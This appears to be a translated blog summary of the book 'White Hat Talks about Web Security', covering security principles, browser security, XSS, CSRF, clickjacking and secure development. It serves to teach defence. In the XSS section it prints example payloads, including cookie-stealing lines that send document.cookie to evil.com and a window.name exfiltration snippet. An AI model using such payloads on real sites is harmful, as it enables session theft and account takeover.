"White Hat Talks about Web Security" Reading Summary

(If you are interested in this Xmind, you can send ``safe'' to the official account at the end of the text to get it)

Safety is a simple science, but also a balanced art.

Like the challenges that developers will encounter, there are many problems that are difficult to expose without being placed in an environment with a large number of users. Since quantitative changes cause qualitative changes, the method of managing 10 servers is definitely different from the method of managing 10,000 servers. Similarly, the method of evaluating the code security of 10 engineers and evaluating the code security of 1,000 engineers must be different. The difference.

The core competitiveness of a security engineer does not lie in how many 0 days he can own and how many security technologies he can master, but in his depth of understanding of security, and the angle and height of his extended view of security issues.

The biggest feature and magic weapon of Internet companies. Security is a dynamic process, because enemy attack methods are changing, attack methods are changing, and loopholes are constantly appearing; our business is changing, software is changing, and people are changing. It is a vain attempt to solve all problems through one system and one solution. It is unrealistic and impossible. Security requires continuous operation and continuous optimization.

The biggest loophole is people. No matter how well-written a program, when someone is involved, various unpredictable situations may occur, such as the administrator’s password may be leaked, the programmer may turn off the secure configuration parameters, etc. . Security problems often occur in unexpected places.

1. Safe World View

security three elements is the basic component of security, namely confidentiality (Confdentiality), integrity (Integrity), availability (Availability).

1. Confidentiality requires the protection of data content from being leaked, and encryption is a common means to achieve confidentiality requirements.
2. Integrity requires the protection of data content to be complete and not tampered with. A common technical means to ensure consistency is digital signature.
3. Availability requires protection of resources to be "available on demand."

security assessment

security assessment can be simply divided into 4 stages: asset classification, threat analysis, risk analysis, and solution confirmation.

asset class classification is the basis of all work, helping us to clarify what our goals are and what we want to protect.

The essence of security is the issue of trust. The divided areas with different trust levels are called trust domains, and the boundary between two different trust domains is divided into trust boundaries.

Data flowing from a high-level trust domain to a low-level trust domain does not need to go through security checks; data flowing from a low-level trust domain to a high-level trust domain requires security checks at the trust boundary.

In practice, you will encounter a situation that is much more complicated than this. For example, there are two applications that have data interaction services between each other. Then you must consider whether the data interaction here is credible for the respective applications and whether it should be in Draw a boundary between the two applications, and then perform security checks on the data flowing through the boundary.

threat analysis is to find out all the threats. How do I find it? Brainstorming is generally used. Of course, there are also some more scientific methods, such as using a model to help us think about where there may be threats. This process can avoid omissions. This is threat modeling.

This book introduces a method of threat modeling, which was first proposed by Microsoft, called the STRIDE model. When we analyze threats, we can consider the following six aspects.

risk analysis , Risk = Probability Damage Potential, risk = probability loss degree

How to measure risk more scientifically? Here is another DREAD model, which was also proposed by Microsoft to guide us from which aspects to judge the risk of a threat.

security solution is the output of the security assessment. The solution must be pertinent. This pertinence is given by the results of the stages of asset classification, threat analysis, and risk analysis.

There is no unsafe business, only unsafe implementation.

So what is a good security solution:

1. Product requirements, especially business requirements, are what users really want and are the meaning of business. When designing a security solution, you should not change the original intention of business requirements as much as possible.
2. Security solutions must be able to effectively resist threats, but at the same time they must not interfere too much with normal business processes, and they must not be delayed in performance.
3. A good security solution should be transparent to the user, and try not to change the user's habits as much as possible.
4. In addition to taking into account the user experience, a good security product or module must be easy to continuously improve. A good security module should also be an excellent program. The design also needs to achieve high aggregation, low coupling, and easy expansion.

White Hat Art of War

1. Blacklist & Whitelist : Set up trusted and untrusted sources.
2. Principle of Least Privilege : Grant only the necessary permissions to the subject, and not over-authorize, which can effectively reduce the chance of system, network, application, and database errors.
3. defense-in-depth principle : contains two meanings: First, security solutions must be implemented at different levels and aspects to avoid omissions. Different security solutions need to cooperate with each other to form a whole. Second, we must do the right thing in the right place, that is, implement a targeted security plan where the fundamental problem is solved.
4. principle of separation of data and code : It is widely applicable to various scenarios that cause security problems due to "injection". Confused the boundaries of data and code, leading to security problems.
5. Unpredictability Principle : From the perspective of overcoming the attack method, make the attack method of the vulnerability invalid. Make it impossible for an attacker to easily guess the expected value, thereby increasing the threshold of attack.

2. Browser Security

Same Origin Strategy

The same-origin policy is the basis of browser security. It restricts "document" or scripts from different sources to read or set certain attributes of the current "document".

In order to prevent confusion in the browser's page behavior, the browser puts forward the concept of "Origin". Objects from different sources cannot interfere with each other.

In the browser <link> <script> , <img> , <iframe> , and 06087cfc0dfe08 are not restricted by the same-origin policy to load resources across domains. Each time these tags with the src attribute are loaded, the browser actually initiates a GET request. . What is different from XHR is that for resources loaded through the tag's src attribute, the browser restricts the permissions of JS so that it cannot read or write the returned content.

For XHR, it can access content from homologous objects. However, XHR is restricted by the same-origin policy and cannot access resources across domains. If XHR can access resources across domains, it may lead to the leakage of some sensitive data, such as CSRF tokens, which may lead to security issues.

XHR cross-domain access requires the HTTP header returned by the target domain to authorize whether to allow cross-domain access, because HTTP headers are generally uncontrollable for JS in the browser, so this solution is considered feasible.

Browser sandbox

Chrome is the first browser to adopt a multi-process architecture. The main processes of Chrome are divided into: browser process, rendering process, plug-in process, and extension process. The plug-in processes such as flash, java, pdf, etc. are strictly isolated from the browser process, so they will not affect each other.

The browser's multi-process architecture separates the various functional modules of the browser, and separates each browser instance. When one process crashes, it will not affect other processes.

The rendering engine is isolated by the Sandbox, and the webpage code needs to communicate with the browser kernel process and the operating system through the IPCchannel, in which some security checks will be performed.

Sandbox is designed to allow untrusted code to run in a certain environment and restrict untrusted code from accessing resources outside the isolation zone. Sandbox needs to consider the possible requests of user code for local file system, memory, database, and network. The policy of default rejection can be adopted. If data exchange must cross the boundary of Sandbox, it can only be through designated data channels, such as encapsulated APIs. To complete, the legitimacy of the request will be strictly checked in these APIs.

Sandbox allows untrusted webpage code and JS code to run in a restricted environment, thereby protecting the security of the local desktop system.

Malicious URL blocking

Malicious URL blocking means that the browser periodically obtains a blacklist of malicious URLs from the server. If the URL that the user visits while surfing the Internet is in this blacklist, the browser will pop up a warning page.

3. Cross-site scripting attack XSS

Cross Site Scripting (XSS) refers to an attack in which a webpage is tampered with through "HTML injection" and malicious scripts are inserted to control the user's browser when the user browses the webpage.

The essence of XSS is a kind of HTML injection. The user's data is executed as part of the HTML code, which confuses the original semantics and generates new semantics.

Classification of XSS

For XSS generated in various different scenarios, it is necessary to treat different scenarios. XSS is divided into different effects:

1. reflective XSS
   Reflective XSS simply "reflects" the data entered by the user to the browser. Hackers often need to induce users to click on a malicious link in order to successfully attack.
2. Storage XSS
   Stored XSS will "store" the data entered by the user on the server side. For example, if you write an article that contains malicious JS code, all users who visit the article will execute this malicious code in their browsers. Such loopholes are extremely concealed, and are buried in the normal business of users, and the risk is quite high.
3. DOM Based XSS
   XSS formed by modifying the DOM node of the page.

The risk of stored XSS is higher than that of reflective XSS, because stored XSS will be stored on the server and exist across pages.

An example of reflective XSS: a page directly outputs the parameters entered by the user to the page, then the user may submit a piece of HTML code, which will be executed directly on the page. We can use this vulnerability to steal the cookies of anyone who visits the page, even the administrator's, for example, enter <img src="http://evil.com/log?"+escape(document.cookie) /> .

An example of a stored XSS: a web page with a message board. If the user input is not filtered and translated, the attacker will leave a message on the message board <script>alert('XSS')</script> and other users will obtain and execute this script when they enter this page.

Examples of DOM Based XSS:

<script>
function test(){
  var str = document.getElementById("text").value;
  document.getElementById("t").innerHTML = "<a href='"+str+"' >testLink</a>";
}
</script>
<div id="t" ></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

The user can enter such a field ' onclick=alert(/xss/) // . This field first closes the first single quotation mark of href with a single quotation mark, then inserts an onclick event, and finally // comment symbol 06087cfc0e0198 to comment out the second single quotation mark. Click this newly generated link and the script will be executed.

Click here see the effect.

You can also close the a label directly and insert a new Script label ><img src=# onerror=alert(/xss2/) />< so that the script can also be executed.

XSS attack

After the previous XSS attack works, there are more things you can do

1. Cookie stealing : The login credentials of the current user are generally encrypted and stored in the Cookie. After obtaining the cookie, the attacker can log in directly into the user's account without passing a password.
   You can load a remote script <script src=http://evil.com/evil.js/> , and send document.cookie to the remote in this script, such as inserting a picture, the src of the picture is "http://evil.com/log?"+escape(document.cookie)
2. forged Get/Post request : The page can be manipulated by sending a Get/Post request by simulating.
   The Get method is relatively simple, and the request is initiated by inserting a picture.
   Post request can use the build form, and then automatically submit the form form.submit() , or it can be sent directly through XHR.
3. XSS Phishing : Attackers can combine XSS with phishing to steal passwords.
   For example, use JS to draw a fake login box on the current page. When the user enters the user name and password in the login box, the password will be sent to the hacker's server.

4. obtain user information :

   1. By obtaining navigator.userAgent or unique differences between browser versions to obtain browser version information, precise browser memory attacks can be implemented.
   2. After knowing the browser and operating system used by the user, by judging the software installed by the user, selecting the corresponding browser vulnerability to achieve the purpose of implanting the Trojan horse.
   3. Through the visited attribute of the CSS style, you can determine whether the user has ever visited a link.
   4. With the help of third-party software or browser controls, the local IP address can be obtained.

<base> tags

<base> tag is the document root URL element, which can appear anywhere on the page and act on all tags located after the tag.

For example, if the page opens a non-existent picture <img src="/images/logo.png"/> <base> tag <base href="http://www.google.com" /> added before the img tag, the picture will be loaded from the specified URL, that is, http://www.google.com/images/logo.png load the resource.

If an attacker inserts the <base> tag in the page, he can forge pictures, links or scripts on a remote server to hijack all relative paths in the current page, including all src that use the 06087cfc0e0548 and href attributes to index resources.

window.name

window.name object is a very magical thing. window.name object in the current window has no special character restrictions. Because the window object is a browser window, not the document object, so often the window object is not restricted by the same-origin policy, so it can realize cross-domain and cross-page data transfer.

For example, in a page attacked by XSS, the information obtained is assigned to window.name , and then it is immediately redirected to another website.

window.name = "test~ User Cookie is: " + document.cookie;
alert(document.domain + " " + window.name);
window.location = "http://www.google.com/";

The information of the previous page can be obtained in another website

console.log(window.name);
// test~ User Cookie is: ...

XSS defense

1. Cookie's HttpOnly logo

If HttpOnly is set for the Cookie, then the Cookie cannot be read through JS. HttpOnly can be selectively added to any cookie value, and only HttpOnly can be marked as the key cookie used for authentication.

HttpOnly solves the Cookie hijacking attack after XSS.

2. Input check

Input checking is generally to check whether the data entered by the user contains some special characters, such as < , > , ' , " etc. If special characters are found, these characters are filtered or encoded.

This approach is similar to a whitelist, which can invalidate some attacks based on special characters.

The logic of input checking must be implemented in server-side code. If you only use JS for input checking on the client side, it is easy for an attacker to bypass it. A common practice is to implement the same input checking in both the client-side JS code and the server-side code. The client input check can block most of the normal users who misoperation, thereby saving server resources.

The more intelligent input check will also match the characteristics of XSS. For example, look for sensitive characters such as <script> and javascript

3. Output check

In addition to rich text output, encoding or escaping can be used to defend against XSS attacks when variables are output to HTML pages. The encoding method HtmlEncode requires the translation of some commonly used special characters, such as & converted to & , < converted to < , / converted to / etc.

4. CSS Expression

In the era of IE5-8, there was a CSS Expression solution. You can write JS in CSS and assign an expression to CSS properties. It was used to do a lot of hack solutions at the time, but it was a temporary solution in the Web era. The solution also has its drawbacks

1. It does not conform to the Web standard. The CSS expression method of inserting JS code into the style is contrary to the concept of separating the structure, performance, and behavior of the Web standard.
2. Inefficient, a CSS expression will be executed repeatedly, which will greatly consume the computer's hardware resources, and in extreme cases will cause the browser to crash.
3. Bringing security risks, CSS expressions expose a script execution context, which may bring hidden dangers of script injection. For example, before, JS code can be executed in the background, which provides a way for XSS.
   For example: background: url(javascript:alert("XSS!"));

The recent CSS Houdini a bit similar to this CSS Expression, you can pay attention to it after the browser is officially launched.

4. Cross-site request forgery CSRF

Cross Site Request Forgery (CSRF)

The attacker first adds a picture <img src="http://blogs.com/blog/remove?id=123"> a web page. This src points to a link to delete a blog in a blog site. When a user visits this web page, the blog on the blog site will be deleted when the picture is loaded.

CSRF defense

1. Verification Code

In the process of CSRF attacks, network requests are often constructed without the user's knowledge. The verification code forces the user to interact with the application in order to complete the final request. Therefore, under normal circumstances, the verification code can well contain CSRF attacks.

But in many cases, due to user experience considerations, websites cannot add verification codes to all operations. Therefore, the verification code can only be used as an auxiliary means to defend against CSRF, rather than as the main solution.

2. Check the Referer header of the HTTP request

Checking the Referer header is often used as a means of preventing hotlinking of pictures, and can also be used to check whether the request comes from a legitimate source.

If the Referer value requested by the user is not this page, or even the domain of the posting website, it is most likely a CSRF attack.

However, the Referer value cannot be obtained by the server at any time, and it may not be obtained in the following situations

1. When redirecting HTTP from HTTPS;
2. The user enters the URL in the address bar;
3. Select the browser bookmark;
4. Set the rel attribute to noreferrer on the <a> , <area> or <link> elements, and will not send the Referer . <a href="http://example.com" rel="noreferrer"> may leak sensitive information and protect the privacy of sensitive information through HTML5.
5. The exit page redirection method, Google and Facebook both use this method, when linking, it does not jump directly, but jumps through a redirect URL.
   https://link.zhihu.com/?target=https%3A//tieba.baidu.com/p/3746839672 does the same. The article a tag link in Zhihu is generally like this 06087cfc0e0bbd
   First jump to https://link.zhihu.com/ , and then jump to the target URL. At this time, the Referer field will not contain the original URL, and the Doc request that you can see when you open Devtools does not contain the Referer field.
   <a href="https://tieba.baidu.com/p/3746839672">Article</a> in the webpage that has an href directly as the target URL, click Jump at this time, and the requested Doc will contain Referer field.

3. Increase Token

CSRF can successfully attack, the essential reason is that all the parameters of important operations can be guessed by the attacker. If a random unpredictable parameter is added, it will greatly increase the difficulty of being CSRF, which is the reason for the introduction of Token.

When using Token, try to put the Token in the form. Change sensitive operations from GET to POST and submit them in form or AJAX to avoid Token leakage.

The Token to defend against CSRF is designed based on the principle of unpredictability. Therefore, the generation of Token must be sufficiently random, and a secure random number generator must be used to generate Token. After the user submits the form, compare whether the Token submitted by the user is consistent with the Token in the current user Session.

5. Click Hijack

CSRF can complete the attack without the user knowing it. But in scenarios that require interaction with users, attack operations cannot be performed, such as if a verification code is required. However, clickjacking allows the user to complete the interaction process unknowingly.

Clickjacking is a visual deception that entices the user to click by covering the place where the user wants to click with a covering. Clickjacking attacks are similar to CSRF in that they all induce users to complete certain actions without their knowledge.

During the CSRF attack, if a user interaction page appears, the attack may not be successfully completed. But clickjacking does not have this concern, it uses the page that interacts with the user.

1. coverage hijacking : use iframe or picture to cover the location of the user's key points;
2. Drag and Hijack : To induce the user to drag the data that the attacker wants from hidden invisible elements, and place it in a place where the attacker can control, thereby stealing the data.
3. touch screen hijacking : hijack the touch screen operation of mobile users. Many mobile browsers hide the address bar in order to save space. Some attack methods draw a disguised address bar on the mobile browser to obtain user input for follow-up Deception.

Defense methods for click hijacking:

1. prohibit ifame nesting : You can exclude iframe nesting by judging whether the location of the current webpage is the top level

   if (top.location !== location) {
     top.location = self.location
   }

   But this method can be bypassed by nesting multiple iframes, or by restricting the execution of JS scripts in iframe pages.

2. use X-Frame-Options header : use HTTP X-Frame-Options header can control the behavior of browser loading frame page, there are three values can be set

   1. Deny, the current page is also not allowed to be displayed in the frame, even if it is nested in pages of the same domain name;
   2. sameorigin, the page can be displayed in the frame of the page with the same domain name;
   3. allow-from uri, the page can be displayed in the frame of the specified source.

For example, we see that SegmentFault uses this HTTP header as a defense against click hijacking

6. HTML5 Security

HTML5 provides an attribute sandbox for the iframe. This attribute can be used to control the content in the iframe through parameters, such as whether to allow form submission, whether to allow script execution, whether to allow access to the top-level window, and whether to allow the same Source access, whether to allow pop-ups, etc., thereby greatly enhancing the security of applications using iframes.

postMessage allows the browser's window (including windows, pop-up windows, iframes, etc.) objects to send text messages to other windows to achieve cross-window messaging. This function is not restricted by the same-origin policy. There are two safety issues that need attention when using:

1. Domain, URL, origin, and source can be verified in the receiving window to prevent messages from illegal pages. This is actually a verification process of the same-origin policy in the code.
2. The received message should not be trusted. Pay attention to the security check and cannot be directly written into innerHTML or Script to prevent the generation of DOM based XSS.

7. Internet business security

When a product has defective functions, extremely poor user experience, or even downtime all day, it is not safe to talk about security, because the product itself may no longer exist. But when a product is doing well in other aspects, security may become a core competitiveness of the product and a secret weapon to widen the gap between the product and its competitors. Only products that are safe and well done can be truly good products.

Whether the search results are safe or not is very important to netizens, because search guides are the most important portal on the Internet. In some fraud cases in the past, phishing websites openly appeared in search results, causing many users to be deceived.

Safety is a characteristic of products. If our products can subtly cultivate users' safety habits and guide users to safer behaviors, then this kind of safety is the most ideal product safety.

An excellent security solution should have two conditions:

1. Good user experience;
2. Excellent performance.

Solutions that can be used safely:

1. factor authentication scheme : For example, the USB of online banking, the dynamic password of the bank, the token of the game, the client certificate, the verification code of mobile phone SMS, etc., have been verified in addition to the user name and password.
However, two-step verification will also reduce the user experience accordingly, because it is more troublesome for users to use it, so use it carefully and only use it in scenarios with very high security requirements, such as payment.
2. increase the password complexity : For example, the password must have 16 digits, and different combinations of numbers, uppercase and lowercase letters, and special characters are required to increase the difficulty of brute force cracking. This is usually required when setting a login password for the server.
3. password brute force cracking detection : Brute force cracking generally has the characteristics of a period of time and high frequency. It can check the number of login failures of an account in a period of time, or the number of login behaviors of a certain IP address in a period of time. These behaviors are more obvious features of brute force cracking. Brute-force cracking often uses scripts or scanners, so after detecting such behaviors, adding verification code links can effectively reduce the risk of brute-force cracking attacks.
In order to avoid security detection, attackers often use multiple IPs from puppet machines or proxy servers to make login attempts. However, if the attack reaches a certain scale, a single IP will eventually initiate multiple network requests. When an IP is found to exist After the malicious behavior, the behavior history record of the IP address is traced.
4. prevents the password from containing personal information : If you find that the user uses personal information such as birthday, user name, phone number, email address, etc. as a password, you should promptly prompt it.

Business logic security

1. Example 1: The account passwords of the two systems A and B have a one-to-one binding relationship. After the password of the system A is modified, it should be synchronized to the system B. However, if the system password is stolen, after the user changes the password of the system A, if If the password is not synchronized to the B system or the synchronization fails, the attacker can still squeeze the login status of the A system by logging in to the B system, or change the password again.
2. Example 2: A system is set to freeze the account for one hour after the account login fails 5 times, then the attacker can keep the account in the frozen state by trying to log in to the account continuously. In the auction scenario, an attacker can bid for goods at a very low price by attacking the accounts of all other users.
3. Example 3: The password modification process is a high-risk process. For example, the user obtains the user login status through Cookie hijacking. At this time, the attacker does not know the user's password. If the password is modified without providing the original password, the attacker has stolen it. The password can be changed after the cookie obtains the login status. Therefore, it is now necessary to verify the user's identity again before sensitive operations. For example, Apple's MacOS and iOS require the user to enter the iCloud password or verify the fingerprint during sensitive operations.
Correspondingly, the password retrieval process is also a high-risk and difficult security issue.

4. Example 4: Returning to the situation where QQ was stolen, there may be multiple possibilities for user account theft

   1. The website login process is not HTTPS, and the password is sniffed during communication;
   2. The user’s computer has a Trojan horse, and the password is obtained by the keylogger;
   3. The user is confused by the phishing website, and the password is defrauded by the phishing website;
   4. A certain login entry of the website can be brute force cracked
   5. There are logic loopholes in the website password retrieval process;
   6. The website has client-side script vulnerabilities such as XSS, and user accounts are indirectly stolen;
   7. The website has server-side vulnerabilities such as SQL injection, and the website is hacked to cause the leakage of user account information.

   User login passwords are also highly similar, such as 123456, 666666, qwerty, abc123, etc. As long as you try these simple password combinations one by one, you can brute force the passwords of many users.

   In addition, the loss of user data caused by the theft of the database of the past website, if the password in the database is stored in plain text, or the hash value is not salted, it may cause the attacker to try different websites of the same user based on these passwords, because Most users are accustomed to using the same password to log in to different websites.

5. Example 5: A phishing website, such as a fake Taobao, may induce users to make payments, or steal the user's real Taobao password, or steal the online banking password.

8. Secure Development Process SDL

The Security Development Lifecycle (SDL), first proposed by Microsoft, is a way to help solve software security problems. The principles of security and privacy are introduced at all stages of development.

The general steps of SDL are as follows:

1. Training: core safety training
2. Requirements: Determine security requirements, create quality gates/error scales, security and privacy risk assessments
3. Design: Determine design requirements, analyze attack surface, and threat modeling
4. Implementation: use approved tools, abandon unsafe functions, static analysis
5. Verification: dynamic analysis, fuzz testing, attack surface evaluation
6. Release: Incident response plan, final security review, release and archive
7. Response: Implement an incident response plan

SDL actual combat experience:

1. Communicate adequately with the project manager and allocate enough time;
2. Standardize the company's project approval process to ensure that all projects can be notified to the security team to avoid omissions;
3. Establish the authority of the security department, the project must be reviewed and completed by the security department before it can be released;
4. Write the technical solution into the work manual of development and testing;
5. Train engineers on safety solutions;
6. Record all security bugs and encourage programmers to write safe code;

Most of the posts on the Internet are of different depths, and even some are inconsistent. The following articles are summaries of the learning process. If you find errors, please leave a message and point out. If this article helped you, don’t forget to like and support it. Like is my biggest motivation for updating! (I don’t like the favorites, they are all hooligans 🤣)~

Reference documents:

1. White Hat Talks about Web Security

PS: This article is included in the blog Github-SHERlocked93/blog series of articles, welcome everyone to pay attention to my public front-end afternoon tea, directly search to add or click here , continue to push the front-end and front-end for everyone Related high-quality technical articles around, make progress together, cheer together~

In addition, you can join the WeChat group of "Front-end afternoon tea exchange group". WeChat search sherlocked_93 add me friends, remark add group , and I will pull you into the group~